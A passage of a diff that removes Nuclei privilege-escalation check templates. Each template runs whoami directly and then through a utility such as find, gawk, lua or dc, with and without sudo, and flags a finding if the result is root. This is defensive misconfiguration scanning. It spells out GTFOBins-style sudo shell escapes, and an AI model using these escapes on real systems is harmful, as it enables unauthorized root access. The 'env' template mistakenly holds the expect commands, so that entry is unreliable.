|
||||||
|
|
||||||
info:
|
|
||||||
name: dc - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
dc is a command-line calculator in Unix and Unix-like operating systems. It uses reverse Polish notation (RPN) and provides a simple and efficient way to perform arithmetic operations from the command line. It can be used for basic and advanced mathematical calculations, making it a handy tool for scripting and quick calculations in the terminal.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/dc/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,dc,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
dc -e '!whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo dc -e '!whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a0046304402205ac8f96adceec1df1bfc74a6cee80bb9be8da55b59bd0d39a2962903d92744e602204525b6c022a9b041ab95f3cc04c0d94db22968d66e1977221c13f4923e20cccd:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-distcc
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: distcc - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
distcc is a distributed compilation tool for C, C++, and Objective-C. It allows a user to distribute compilation of these languages across several machines on a network, which can significantly speed up the compilation process for large projects.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/distcc/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,distcc,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
distcc whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo distcc whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a0046304402205ba3e54f4b95e19c1661de38e4b1fc44d192293ddfc358839ce83bb50f2f310b02201c16dafa2e5fbab09c2d6cb3fd330dbe9c2f815ed63bb432a4314a1c8d66acaa:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-elvish
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: elvish - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
elvish is a Unix shell that emphasizes expressiveness and extensibility. It aims to provide a more user-friendly and programmable shell experience, with features such as a powerful scripting language, a rich set of data types, and a clean and consistent syntax.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/elvish/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,elvish,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
elvish -c 'whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo elvish -c 'whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022006ef5df54c4af5c94d5a8116e6729d5f02092d18272e0679ab271be1237406ae022100dede2ce3e800f4da16d6b7495bc2ce6f6b1aaf30870ec0900b1c4f0fcff8e3e2:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-enscript
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: enscript - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
enscript is a command-line tool used for converting text files to PostScript format for printing. It provides various options for formatting and manipulating the output, making it a useful tool for generating high-quality printed documents from text files.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/enscript/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,enscript,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
enscript /dev/null -qo /dev/null -I 'whoami >&2'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo enscript /dev/null -qo /dev/null -I 'whoami >&2'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100cd92c4051987599289f054963d4a8bef07e76dde6a71fc5369dfb8d7bd7d6de502203d17432adfb10310d44a7665cd1039f3ed412c9724b10499074976a8abe39a41:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-env
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: env - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
In Linux, the env command is used to display or modify the environment variables for a command. It can be used to set environment variables for a specific command or to print the current environment variables.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/env/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,env,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
expect -c 'spawn whoami;interact'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo expect -c 'spawn whoami;interact'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022060c647f36eb03856e0eaf016f8c04e4bf4100be1884abc528dbadb7d377272500221008e50317abae9efa259ad2a682bc304062fccb32782430543cb1aa2a6c34b32b4:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-expect
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: expect - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
expect is a Unix scripting and testing utility that automates interactive applications such as telnet, ftp, passwd, fsck, rlogin, tip, and more. It uses scripts to control interactive applications, making it useful for automating tasks that involve user input.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/expect/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,expect,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
expect -c 'spawn whoami;interact'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo expect -c 'spawn whoami;interact'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100a073cb82c1a879f2dcb9365115bf48040e82ca681024d4ffc00c3fe1069eadea02207a1d5377c689cba96b0c4af6d23866def098d684efedee083f2443b480ac11d4:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-find
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: find - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
The find command in Linux is used to search for files and directories in a directory hierarchy based on various criteria such as name, type, size, and permissions. It is a powerful tool for locating files and performing operations on them, such as executing commands or applying changes.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/find/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,find,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
find . -exec whoami \; -quit
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo find . -exec whoami \; -quit
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4b0a0048304602210088a9e54d22ecaf73f27add5afc616c28d2bae731b36d30b54c1b22a8336842f4022100d0d9b84c518dad57a1d1d9e47f4fb936b0432d75bab077f44feeb0af407cdac5:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-fish
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: fish - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
fish is a user-friendly command-line shell for Unix-like operating systems. It provides features such as syntax highlighting, autosuggestions, and a built-in scripting language. Fish aims to be easy to use and learn, making it a popular choice for both interactive shell usage and scripting.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/fish/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,fish,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
fish -c 'whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo fish -c 'whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100b8c37d7d92e15ddf46da724d5b6fc80370b17ad700869f5db2d2773c92fc971c02207927e8db3a6c8d4f5c7ae5d350feee388a6966bfa029f15fdde4a71b1be75bf0:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-flock
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Flock - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
flock is a command-line utility in Unix-like operating systems that is used to manage file locks. It can be used to synchronize access to a file among multiple processes, preventing conflicts and ensuring data integrity. Additionally, flock can be used in shell scripts to control access to critical sections of code.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/flock/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,flock,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
flock -u / whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo flock -u / whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4b0a00483046022100eaf218a03c71c87c400be7cf0c1a081838f0f82fb83278cd47bb1d442dc806f7022100a9c552cfce0ef36e1b5667fbe535aaf721f8bccb6b7128b9bf15ae5aadfb36f2:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-gawk
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: gawk - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
gawk is the GNU implementation of the AWK programming language. It is a powerful text processing tool that allows for pattern scanning and processing of text files. gawk is commonly used for data extraction, reporting, and manipulation tasks in shell scripts and command-line environments.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/gawk/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,gawk,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
gawk 'BEGIN {system("whoami")}'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo gawk 'BEGIN {system("whoami")}'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022020f4d974f3c1c91fc22770c9ddc902e1730f238b504ebe4841afce2655b8787e0221008b88f06c877c3cd9a6f631fb933703d0e8cc518cd43814b1d3c4c38cd2e72c3b:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-grc
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: grc - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
grc is a command-line utility that enhances the output of other commands with color and style. It is commonly used to improve the readability of command output by adding color highlighting and formatting. grc can be configured to work with various commands and is often used to make log files and command output easier to interpret.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/grc/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,grc,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
grc --pty whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo grc --pty whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a0047304502203f113d23698935598ff0d77fdf51bf1ca11d3a69f5dc82268a9529bc4da4e3340221008386bd8523a073f3ecf134d4cb0034246089b5f32e4eda4f2fb7e7c847c63978:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-ionice
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: ionice - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
ionice is a command-line utility in Linux that is used to set or get the I/O scheduling class and priority for a program. It allows users to control the I/O priority of a process, which can be useful for managing system resources and improving overall system performance.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/ionice/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,ionice,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
ionice whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo ionice whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a0046304402200dc051f60cfa8b06d03cf29eb136b6d42a7ba17cc2e495bd74567b4d43085d1c0220092a4e9e5c1be7c995fa058be2330cede3897eac1aa048b8a16150dc601dfdfa:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-julia
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Julia - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
Julia is a high-level, high-performance programming language for technical computing. It is designed for numerical and scientific computing, but it is also used for general-purpose programming. Julia is known for its speed and ease of use, and it has a growing community of users and developers.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/julia/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,julia,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
julia -e 'run(`whoami`)'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo julia -e 'run(`whoami`)'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a00463044022008cde511c19f2e81af9ea724afbfb70af2b46b90969efa5dd93fc95214e0fe5602200da4093ad99901bf9d7c8d6dc7c222dce24b38ec0de355c37560a48fc5d87e91:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-lftp
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: lftp - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
lftp is a command-line file transfer program for Unix-like systems. It supports various protocols such as FTP, HTTP, SFTP, and FISH, and provides a range of features for file transfer and mirroring. lftp is known for its reliability and scriptability, making it a popular choice for automated file transfer tasks.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/lftp/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,lftp,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
lftp -c '!whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo lftp -c '!whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4b0a004830460221009a7ba137fdf1380d4bc9afe57a3ffa1ecee7a9bbcfb87d7ad307800668bfe4d5022100ed4696a4fea878b8f4cf733026f909ba49c989c54800817c36e8f32e7815c821:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-ltrace
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: ltrace - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
ltrace is a debugging utility in Linux that is used to intercept and record dynamic library calls made by a process. It can be used to trace the library calls made by a program, which is helpful for debugging and understanding its behavior.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/ltrace/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,ltrace,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
ltrace -b -L whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo ltrace -b -L whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4b0a00483046022100a452f6736abe6bbadb861e870601d904d7439ccddb99b99c9813c60890cf6454022100ce8f36f3a3960ccacd29196c18c151075811bca88c4609b018d44611e7da91f4:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-lua
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: lua - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
Lua is a powerful, efficient, lightweight, embeddable scripting language. It is often used as a scripting language for game development and other applications that require a customizable and extensible scripting interface. Lua is known for its simplicity, speed, and ease of integration with other languages and systems.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/lua/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,lua,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
lua -e 'os.execute("whoami")'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo lua -e 'os.execute("whoami")'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100fe88d4daba0948f777be6dfe5e85dc1896f8b55009e3cac210034ad321c3e82d02203840fbc951223967db8270b7c5337cb8c464b58b62a5f8563d3d9e48c4804ead:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-mawk
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: mawk - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
mawk is an efficient and fast implementation of the AWK programming language. It is designed to be smaller and faster than the original AWK implementation, making it suitable for large data processing tasks. mawk is commonly used for text processing and pattern scanning in shell scripts and command-line environments.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/mawk/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,mawk,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
mawk 'BEGIN {system("whoami")}'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo mawk 'BEGIN {system("whoami")}'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
